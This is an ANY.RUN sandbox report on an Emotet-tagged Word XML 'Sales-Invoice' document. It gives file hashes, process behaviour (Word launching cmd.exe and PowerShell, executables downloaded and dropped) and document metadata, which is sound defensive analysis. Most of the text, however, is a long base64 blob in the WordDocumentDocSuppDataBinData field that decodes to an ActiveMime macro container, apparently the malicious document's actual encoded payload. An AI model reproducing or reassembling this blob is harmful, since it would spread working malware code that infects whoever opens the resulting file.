Sales-Invoice

Full analysis: https://app.any.run/tasks/6f335336-6fae-42f2-beea-17bcc8a40d6f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 19:23:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

02AF2B2605265390740D1F6F615D1CB4

SHA1:

A20A20F3801276B628EF2C73BE7ABDD5C9DAB0A0

SHA256:

7128E6E5E0516C991D67DDE86A8CA0A1D7AFAA529246C3D645E9445BE886E3E1

SSDEEP:

3072:6uXLOI/PIwr8oAxJPjL/xSu90OoiLuDKZXfwKeljR1z:6u7r/PIwr8o2vxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2672)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2672)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2360)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3804)
    • Application was dropped or rewritten from another process

      • 229.exe (PID: 3792)
      • 229.exe (PID: 2820)
      • wabmetagen.exe (PID: 2704)
      • wabmetagen.exe (PID: 3304)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 4072)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3000)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4032)
      • cmd.exe (PID: 2360)
      • cmd.exe (PID: 2668)
      • cmd.exe (PID: 2796)
    • Application launched itself

      • cmd.exe (PID: 2668)
      • wabmetagen.exe (PID: 2704)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4072)
      • 229.exe (PID: 2820)
    • Creates files in the user directory

      • powershell.exe (PID: 4072)
    • Starts itself from another location

      • 229.exe (PID: 2820)
    • Connects to unusual port

      • wabmetagen.exe (PID: 3304)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2672)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2672)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 4072)
      • 229.exe (PID: 2820)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 006F3A2D
WordDocumentBodySectPRsidRDefault: 00E9115B
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 